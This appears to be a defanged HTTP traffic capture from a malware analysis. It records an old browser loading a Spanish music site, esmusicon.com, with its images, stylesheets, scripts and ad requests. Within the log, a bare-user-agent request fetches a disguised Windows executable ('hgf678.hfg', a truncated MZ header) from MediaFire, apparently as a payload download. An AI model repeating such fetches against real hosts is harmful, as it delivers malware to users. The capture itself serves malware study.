GET /Imagenes/f.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:29 GMT

Content-Type: image/gif

Content-Length: 531

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-213"

Accept-Ranges: bytes

GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................!.......,..........p...(. 2B.'.."%@:<17..).=>.3!..58?.$-.......4.A...0.;.&..C*.#.,.... 9.6/H........E......EF.......G.......D........;....

GET /Imagenes/e_17.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:29 GMT

Content-Type: image/gif

Content-Length: 130

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-82"

Accept-Ranges: bytes

GIF89a..0....................................................!.......,......0.../p.I..f..vO_'tD7t...]......\...2)s2%..."v8..ri...;....

GET /Imagenes/i_13.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:29 GMT

Content-Type: image/gif

Content-Length: 156

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-9c"

Accept-Ranges: bytes

GIF89a.......................................................................................................!.......,........... .9G.@..@..$Q.0ql.uD.y.G!.;....

GET /Imagenes/i_28.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:30 GMT

Content-Type: image/gif

Content-Length: 48

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-30"

Accept-Ranges: bytes

GIF89a.............!.......,................\..;....

GET /Imagenes/i-play.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:30 GMT

Content-Type: image/gif

Content-Length: 393

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-189"

Accept-Ranges: bytes

HTTP/1.1 200 OK..Server: nginx/1.4.7..Date: Mon, 21 Apr 2014 11:57:30 GMT..Content-Type: image/gif..Content-Length: 393..Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT..Connection: keep-alive..ETag: "515a39e9-189"..Accept-Ranges: bytes..GIF89a.....2.LLLSSS333......PPP ??? 999211"""vvvuuu///zzznnn...ooo222......QQQ......WWW777BBB...,,,...CCC|||......--->>>666......EEE%%%___......MMMZZZ...TTT;;;..........................................!.....2.,...........@.,F,..E.0.j:.PU 6l......".`..x......Z....i..E..`...b...$...!"y.-...D.%..%.....%.D.#....".......D.)..........D)'........)D.,......D./......E. .... .DC. &.... .TBH.GBA.;....

GET /Imagenes/ii_13.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:31 GMT

Content-Type: image/gif

Content-Length: 176

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-b0"

Accept-Ranges: bytes

GIF89a..0.......'''............///...111......]]]OOO...___NNN................................................!.......,......0...- A(..%..B..B...rm.x..|....pH..^......^...a....;....

GET /Imagenes/syij4.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:31 GMT

Content-Type: image/gif

Content-Length: 351

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-15f"

Accept-Ranges: bytes

HTTP/1.1 200 OK..Server: nginx/1.4.7..Date: Mon, 21 Apr 2014 11:57:31 GMT..Content-Type: image/gif..Content-Length: 351..Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT..Connection: keep-alive..ETag: "515a39e9-15f"..Accept-Ranges: bytes..GIF89a...............................@@@.................................222.................................................................................................................................!.......,..........|..pH,n2.Lq.< ..a!..P..lVt.....c.".T...e...).).U...G...B..D.,.~..,%QvxBz,.Q.,(n..,..T..e,.#.W....!.,..Z-',..B.}...XV.S.N...IA.;....

GET /Imagenes/i_84.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:32 GMT

Content-Type: image/gif

Content-Length: 155

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-9b"

Accept-Ranges: bytes

GIF89a.......................................................................................................!.......,............$.dYJ.....<@. B.$.C4....;....

GET / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Range: bytes=1460-

Unless-Modified-Since: Mon, 07 Apr 2014 17:00:48 GMT

If-Range: "5342d9c0-1ff32"

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

Cookie: __utma=127640345.1684967166.1398081329.1398081329.1398081329.1; __utmb=127640345.1.10.1398081329; __utmc=127640345; __utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

HTTP/1.1 206 Partial Content

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:43 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 129406

Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT

Connection: keep-alive

ETag: "5342d9c0-1ff32"

Content-Range: bytes 1460-130865/130866

vascript" src="Js/Funciones.js"></script>. <script type="text/javascript" src="Js/swfobject.js"></script>. . </head>. <body onload="iniciarPlayList(0, 1);">.. <div id="Aero"></div>. <div id="Overlay"></div>.. <div style="text-align:center;">. <div align="center" id="cuerpo">. <div id="cabecera">. <div id="logo"></div>. <div id="cabecera_abc">. <div id="c_1">. <div style="height:5px;#height:2px; _height:0px;"><img src="" height=1 style="display:none"></div>. <div align=right style=" *margin-top:-13px; _margin-top:10px; padding-left:285px; color: #f4f4f4;"> . <form action="acceso.php" method="post">.. <span class="superior-lg" style="margin-right:3px"> . <input name="Email" onfocus="if (this.value == 'Email'). this.value = '';" onblur="if (this.value == ''). this.value = 'Email'

<<

<<< skipped >>>

GET /download/icv44fwz74gj29z/hgf678.hfg HTTP/1.1

User-Agent: Mozilla/4.0

Host: VVV.mediafire.com

Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc

HTTP/1.1 302

Date: Mon, 21 Apr 2014 11:57:21 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: close

Cache-control: no-cache

Expires: 0

Location: hXXp://download627.mediafire.com/lmpb2mr1rucg/icv44fwz74gj29z/hgf678.hfg

Pragma: no-cache

Server: MediaFire

Access-Control-Allow-Origin: *

0..

GET /Estilos/CSS.Sitio.css HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:27 GMT

Content-Type: text/css

Content-Length: 16269

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-3f8d"

Accept-Ranges: bytes

.#WARNING_BANNER_BASIC{. display:none !important;. visibility: hidden !important;.}.#WARNING_BANNER_LIVE{. display:none !important;. visibility: hidden !important;.}..body {.font-size:11px;.font-family:Arial;.background: url('../Imagenes/f.gif') #fff; background-repeat: repeat-x;.margin:0.}..anuncio{width:300px;height:250px;margin-bottom:3px;position:relative;margin-top:5px;float:left;margin-left:5px}#anuncios...abc { background-image:url('../Imagenes/i_08.gif'); border: 1px solid #f9f7f7; border-bottom: 0px ; }..#Abecdr{.padding: 0;.text-decoration: none; .background: transparent;.voice-family: "\"}\"";.voice-family: inherit;.padding-left: 5px;.}..#Abecdr div{.display:indivne;.margin:0 2px 0 0;.padding:0;.text-transform:uppercase;.}...#Abecdr a{.float:left;.color: #666;.font: bold 11px Verdana;.margin:0 12px 0 0;...padding:0 0 0 5px;.text-decoration: none; .}.#Abecdr a:hover {color: #000;}.....Listado{.float:left;.border-bottom: 1px solid #cacaca;.border-bottom-width: 0;.width: 255px;.}..* html .Listado{.width: 250px;.}...Listado ul{.padding: 0;.margin: 0;.list-style-type: none;.}...Listado li{.width: 100%;.padding: 5px 3px;.display:block;.font: normal 9px Verdana;.color: #666666;.text-decoration: none;.border-bottom: 1px solid #C0C0C0;.}...Listado a{.font: normal 12px Verdana,Arial;.color: #595959;.text-decoration: none;..}...Listado a:hover{.font: normal 12px Verdana,Arial;.color: #000;.text-decoration: none;.}...Listado li a:hover{.font: normal 12px Verdana,Arial;.color: #242424;.text-decorati

<<

<<< skipped >>>

GET /Estilos/CSS.Panel.css HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:27 GMT

Content-Type: text/css

Content-Length: 735

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-2df"

Accept-Ranges: bytes

.Menu-p{..padding: 5px 0;..margin-left: 0;..font: bold 11px Arial;..border-bottom: 1px solid #ccc;..list-style-type: none;..text-align: left; ..}...Menu-p li{..display: inline;..margin: 0;..}...Menu-p li a{..text-decoration: none;..padding: 5px 7px;..margin-right: 0px;..border: 1px solid #ccc;..border-bottom: none;..background-color: #f4f4f4;..color: #666;..}...Menu-p li a:visited{..color: #2d2b2b;..}...Menu-p li a:hover{..background-color: #fff;..background-position:0% -8px;..color: #2d2b2b;..}.....Menu-p li.selecc a{..position: relative;..top: 1px;..padding-top: 8px;..background-color: #fff;..color: #000;..}..#cont_menu {margin-top:-12px;_margin-top:-19px;#margin-top:-20px;padding:10px; border:1px solid #ccc;}....

GET /Js/Funciones.js HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:27 GMT

Content-Type: application/x-javascript; charset=utf-8

Content-Length: 8384

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-20c0"

Accept-Ranges: bytes

// Coddigo Javascript By Andy (^_^)!..var cabecera = '<span style="padding-right:50px; height:16px"><a href="#cerrar" onclick=" ocultar(); return false"><img border=0 align=right src="./Imagenes/x-i.gif"></a></span><div style="width:450px; padding:30px">';..function limitesPantalla() {. .. if(typeof( window.innerWidth ) == 'number' ) .. {return window.innerWidth "-" window.innerHeight; .. }else if(document.documentElement && (document.documentElement.clientWidth||document.documentElement.clientHeight)).. {return document.documentElement.clientWidth "-" document.documentElement.clientHeight;.. }else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ).. {return document.body.clientWidth "-" document.body.clientHeight;.. }return null;..}..function arreglaraResolucion(capa){...var resolucion = limitesPantalla().split("-");...$(capa).style.width = Math.floor(resolucion[0]) "px";...$(capa).style.height = Math.floor(resolucion[1]) "px";..}....function MuestraCapa(){... arreglaraResolucion("Aero");... $("Aero").style.display = "block";....$("Overlay").style.display = "block"; ... ..}..function ocultar(){.. $("Aero").style.display = "none";.. $("Overlay").style.display = "none";..}..function ReportarError(){...MuestraCapa();....var FoHTML = '<div style="width:500px"><div id="Errors"></div>Email:<br /><input class="CampoLg" id="rep_Email" style="font:normal 12px Arial; width:450px" oncli

<<

<<< skipped >>>

GET /Imagenes/i-2i.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:28 GMT

Content-Type: image/gif

Content-Length: 1097

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-449"

Accept-Ranges: bytes

HTTP/1.1 200 OK..Server: nginx/1.4.7..Date: Mon, 21 Apr 2014 11:57:28 GMT..Content-Type: image/gif..Content-Length: 1097..Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT..Connection: keep-alive..ETag: "515a39e9-449"..Accept-Ranges: bytes..GIF89a2.........ppp...{{{sss...qqqtttvvvzzzuuu~~~ooonnn...xxx......VVV............rrr......yyy...}}}......aaa|||.........lll...........................UUU........................FFFcccYYY%%%...EEE[[[)))XXX]]]...___......RRR...ddd!!!eeebbb........................jjj///.........SSS...............222..................WWW......ggg............iii...kkkmmmfff..........................................!.......,....2.......&>o.n.........o>&T.kjf........jk.^mDj........jDS 6g........g6..k...........l...........i...........d.d........n.....n..d....n.....p...A...X..@....Nh(P!.... ^...@...).,......,.(.... .D...@...6)8(q......*.@AAM..Z....@..P.D.....%.F.H0.......@.....4.F.r....#.........P..Y.w..0.6..q F........I.&.....`....$ ."..a.5..`r...6.R?. .C..c..`.`.....(PcD...)..N..x.v2@...!......y@]........B....<."`......< .b....<......7/.H...........p$.AG.$.G.3..A......`(..........0C.....L..........,R.C...@..........F...0...h@..)6...C.`....@.$.J..#.p.a..ppX..$4.c.$p.%.[fY%.0..@._v...@.(..t.i..x..D.W......*..=.....&....6.(.9.....Vj...f.).?`.D...*....j..q$.........~....|p....z....`..7.Q....k...&{l.7 aB .;....

<<

<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:29 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 130866

Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT

Connection: keep-alive

ETag: "5342d9c0-1ff32"

Accept-Ranges: bytes

.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">. <head>. <title>Musica Online</title>. <meta name='title' content="Musica Online">. <meta name='description' content="Musica Online tiene un gran repertorio de musica en linea, disfruta de la canciones que mas suenan en la disco, mira los videos y letras de tus canciones favoritas">. <meta name='keywords' content="MUSICA ONLINE,ESCUCHAR MUSICA, MUSICA EN LINEA">. <meta name="robots" content="index, follow"/>. <meta name="author" content="Musica Online"/>. <meta name="copyright" content="Musica Online 2012 Derechos Reservados"/>. <meta http-equiv="Content-Language" content="es"/>. <meta name="revisit" content="1 days"/>. <meta NAME="googlebot" content="index, follow" />. <base href="hXXp://esmusicon.com/" />. <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />. <link href="./Estilos/CSS.Sitio.css" rel="stylesheet" type="text/css" />. <link href="./Estilos/CSS.Panel.css" rel="stylesheet" type="text/css" />. <script type="text/javascript" src="Js/Principal.js"></script&g

<<

<<< skipped >>>

GET /atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: content.yieldmanager.edgesuite.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache

ETag: "c83b510be812cec3ea3446015eb76621:1362040945"

Last-Modified: Thu, 28 Feb 2013 08:42:25 GMT

Accept-Ranges: bytes

Content-Length: 12790

Content-Type: image/gif

Cache-Control: max-age=31536000

Date: Mon, 21 Apr 2014 11:57:30 GMT

Connection: keep-alive

GIF89a,............LYd...........].....$........................u.............................kz....--,......Z[[......hs~.........Yft......iii.....................===...........?......yyy..k........:......kdR..................P..SQM...MG<............LLL...am|...............z.............p...........@3;Cry........................M..j.....T}..........8oe0................r..........'$!;?D32/.....#@;,..g~xf...........?..@k..&-2c]N..oTK.... .......2..PbZ .. @KS..^ /3..............[RSSn`......#/(#.......................................:...............................................................................................................................?..............................................................|VP@.......................@......vo^...... ..........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6CD02DE71020681192B0F62CC8CAFC32" xmpMM:DocumentID="xmp.did:E08C90CE76DB11E2999F9E83767C5A85" xmpMM:InstanceID="xmp.iid:E08C90CD76DB11E2999F9E83767C5A85" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:

<<

<<< skipped >>>

GET /atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: content.yieldmanager.edgesuite.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache

ETag: "c5f8760e7af5ff75c20de7295e421a6f:1369930580"

Last-Modified: Thu, 30 May 2013 16:16:20 GMT

Accept-Ranges: bytes

Content-Length: 8452

Content-Type: image/png

Cache-Control: max-age=31536000

Date: Mon, 21 Apr 2014 11:57:44 GMT

Connection: keep-alive

.PNG........IHDR...,..........mz.....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:715197BE01A8E211AE8E8C0F5502677A" xmpMM:DocumentID="xmp.did:E2D1E953B17811E2B5CAADD2918C7F5D" xmpMM:InstanceID="xmp.iid:E2D1E952B17811E2B5CAADD2918C7F5D" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:67A5A78D05A8E211AE8E8C0F5502677A" stRef:documentID="xmp.did:715197BE01A8E211AE8E8C0F5502677A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.$.....4IDATx.....U....[f...@..7V..}....O.*....*.Rh.J*)CL.L.$&~1..$....,.SQ..G...{...2#.,..`.....y.9w...\..f......k....ow...>.....r..........@....,.@....,......,................@......@....,.@....,......,................@......@....,.@....,.@....,......,................@......@....,.@....,......,................@......@....,.@....,......,......,................@......@....,.@....,......,.....................PUUE/.@..=z4....... X...!{...oM.4..4LS.]....P.jM.j.....q.T...X..T.....D.k.....@.4.......|$Aw....."Mw"V..t..`.....K.bu

<<

<<< skipped >>>

GET /atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: content.yieldmanager.edgesuite.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache

ETag: "fa1b6b9794e5b240bbad703d9f4c9a12:1367856632"

Last-Modified: Mon, 06 May 2013 16:10:18 GMT

Accept-Ranges: bytes

Content-Length: 15267

Content-Type: image/png

Cache-Control: max-age=31536000

Date: Mon, 21 Apr 2014 11:57:44 GMT

Connection: keep-alive

.PNG........IHDR...,.................tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:211756DD4AB2E211A404EF4A360AC1CD" xmpMM:DocumentID="xmp.did:913497AFB61D11E2A8829ABD2766D2B2" xmpMM:InstanceID="xmp.iid:913497AEB61D11E2A8829ABD2766D2B2" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FD1762791CB6E211B633949A72F8A6AB" stRef:documentID="xmp.did:211756DD4AB2E211A404EF4A360AC1CD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>E.....7.IDATx..}.xT....IBH...@....l*....U.....vQ.b .Zk.j..Z.........Q6eQ..H...@....IX..B.d.....s<.3...-...e.s...9.{...s.=..u...p(6......QQ..5..`..D'\.b..."...U....D..x..7.Q.HX.T.UV...%(...(%......h.m.:EB...VY.jfL...Y4lJ..PU..1...U.C...0.........y..v;.6F...B..N..P.b..9..3.c.Ua$..i.Fy......<yr..];v...~..=..#))).}.Qd..'.|.C...?.pHJk..a.N...8`1=u....o............kb...#rQ...P3..[.f...%<..cIII.|.BDB(.P. }=.]..H.@.>..K......'i.....qc.. ....*.K..s....}.u....-.V....$.8p.W.b..].Ejjj]wG.,..aEEEi...1..J.z....|..7..s.....{..I.

<<

<<< skipped >>>

GET /swidget/h20d2qja0b7p.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: whos.amung.us

Connection: Keep-Alive

HTTP/1.1 303 See Other

Date: Mon, 21 Apr 2014 11:57:46 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://widgets.amung.us/small/05/567.png

Set-Cookie: uid=CgH9JVNVB7ouXzqMKw CAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=atta; path=/

0..

GET /lmpb2mr1rucg/icv44fwz74gj29z/hgf678.hfg HTTP/1.1

User-Agent: Mozilla/4.0

Connection: Keep-Alive

Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc

Host: download627.mediafire.com

HTTP/1.1 200 OK

Server: LRBD-bigdownload-

Date: Mon, 21 Apr 2014 11:57:22 GMT

Connection: close

Accept-Ranges: bytes

Content-transfer-encoding: binary

Content-Length: 162416

Content-Disposition: attachment; filename="hgf678.hfg"

Content-Type: application/x-dosexec

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].......................p...............rich............................PE..L...h........................ ....................@..................................U..........................................$........................4...$...$...................$...............................................................text............................... ..`.data....!..........................@....rsrc.p."...........................@..@l.[J.............SVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<

<<< skipped >>>

GET /imp?Z=300x250&s=5397210&_salt=3369660399&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ads.yahoo.com

Connection: Keep-Alive

Cookie: B=7atjd219la1t9&b=3&s=iu

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 11:57:29 GMT

Server: YTS/1.20.13

X-RightMedia-Hostname: raptor0973.rm.bf1.yahoo.com

P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"

Set-Cookie: ih="b!!!!#!L>v#!!!!#>gR*'"; path=/; expires=Wed, 20-Apr-2016 11:57:29 GMT

Set-Cookie: vuday1=IsXSs!6tS(i!$_D; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT

